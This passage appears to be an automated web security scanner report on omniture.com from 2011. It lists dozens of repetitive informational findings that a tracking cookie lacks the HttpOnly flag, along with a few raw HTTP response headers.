Host:	http://www.omniture.com
Path:	/en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:51:49 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.531. http://www.omniture.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.532. http://www.omniture.com/en/community previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:00 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.533. http://www.omniture.com/en/community/blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/blogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.534. http://www.omniture.com/en/community/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/events

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.535. http://www.omniture.com/en/community/usergroups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/usergroups

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.536. http://www.omniture.com/en/company/adobe_faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/adobe_faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:38:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.537. http://www.omniture.com/en/company/analyst_insight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/analyst_insight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.538. http://www.omniture.com/en/company/customers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/customers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:15 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.539. http://www.omniture.com/en/company/press_room previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.540. http://www.omniture.com/en/company/press_room/awards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/awards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.541. http://www.omniture.com/en/company/press_room/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:47 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.542. http://www.omniture.com/en/company/press_room/press_releases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/press_releases

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.543. http://www.omniture.com/en/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:45:56 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.544. http://www.omniture.com/en/contact/company previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/company

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:56 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.545. http://www.omniture.com/en/contact/email previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/email

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.546. http://www.omniture.com/en/contact/feedback previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/feedback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.547. http://www.omniture.com/en/contact/offices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/offices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.548. http://www.omniture.com/en/contact/sales previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/sales

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.549. http://www.omniture.com/en/contact/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.550. http://www.omniture.com/en/education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:27 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.551. http://www.omniture.com/en/education/academic_initiative previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/academic_initiative

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:51 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.552. http://www.omniture.com/en/education/certification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.553. http://www.omniture.com/en/education/certification/implementation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/implementation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.554. http://www.omniture.com/en/education/certification/insight_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_analyst

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:39 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.555. http://www.omniture.com/en/education/certification/insight_architect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_architect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:46 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.556. http://www.omniture.com/en/education/certification/search_center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/search_center

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:43 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.557. http://www.omniture.com/en/education/certification/site_catalyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/site_catalyst

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:46 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.558. http://www.omniture.com/en/education/certification/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:45 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.559. http://www.omniture.com/en/education/certification/test_target previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/test_target

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.560. http://www.omniture.com/en/education/courses previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.561. http://www.omniture.com/en/education/courses/discover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/discover

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.562. http://www.omniture.com/en/education/courses/dop_analyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/dop_analyst

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.563. http://www.omniture.com/en/education/courses/merchandising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/merchandising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:48 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.564. http://www.omniture.com/en/education/courses/online_marketing_suite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/online_marketing_suite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.565. http://www.omniture.com/en/education/courses/sbu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sbu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.566. http://www.omniture.com/en/education/courses/searchcenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/searchcenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.567. http://www.omniture.com/en/education/courses/sitesearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sitesearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:13 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.568. http://www.omniture.com/en/education/courses/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/survey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.569. http://www.omniture.com/en/education/courses/testandtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/testandtarget

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.570. http://www.omniture.com/en/partners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:42 GMT
Content-Length: 21370
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Program Overvi
...[SNIP]...

12.571. http://www.omniture.com/en/partners/apply previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/apply

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.572. http://www.omniture.com/en/partners/portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/portal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:54 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.573. http://www.omniture.com/en/partners/showcase previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/showcase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:49 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.574. http://www.omniture.com/en/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.575. http://www.omniture.com/en/privacy/2o7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/2o7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

omniture_unique=c4b47f0affb47cea2cd263f6285f016c; path=/; domain=omniture.com
imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:24 GMT; path=/; domain=omniture.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.576. http://www.omniture.com/en/privacy/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.577. http://www.omniture.com/en/privacy/product previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/product

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.578. http://www.omniture.com/en/privacy/visualsciences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:18 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:18 GMT
Content-Length: 21092
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Company | Visual Sci
...[SNIP]...

12.579. http://www.omniture.com/en/privacy/visualsciences/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.580. http://www.omniture.com/en/privacy/visualsciences/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:25 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.581. http://www.omniture.com/en/privacy/visualsciences/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/terms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:28 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.582. http://www.omniture.com/en/product_tours/form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/product_tours/form

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.583. http://www.omniture.com/en/products/conversion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:54 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.584. http://www.omniture.com/en/products/conversion/merchandising previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/merchandising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:14 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.585. http://www.omniture.com/en/products/conversion/publish previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/publish

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.586. http://www.omniture.com/en/products/conversion/recommendations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/recommendations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.587. http://www.omniture.com/en/products/conversion/searchandpromote previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/searchandpromote

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:39 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.588. http://www.omniture.com/en/products/conversion/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/survey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:42 GMT; path=/; domain=omniture.com

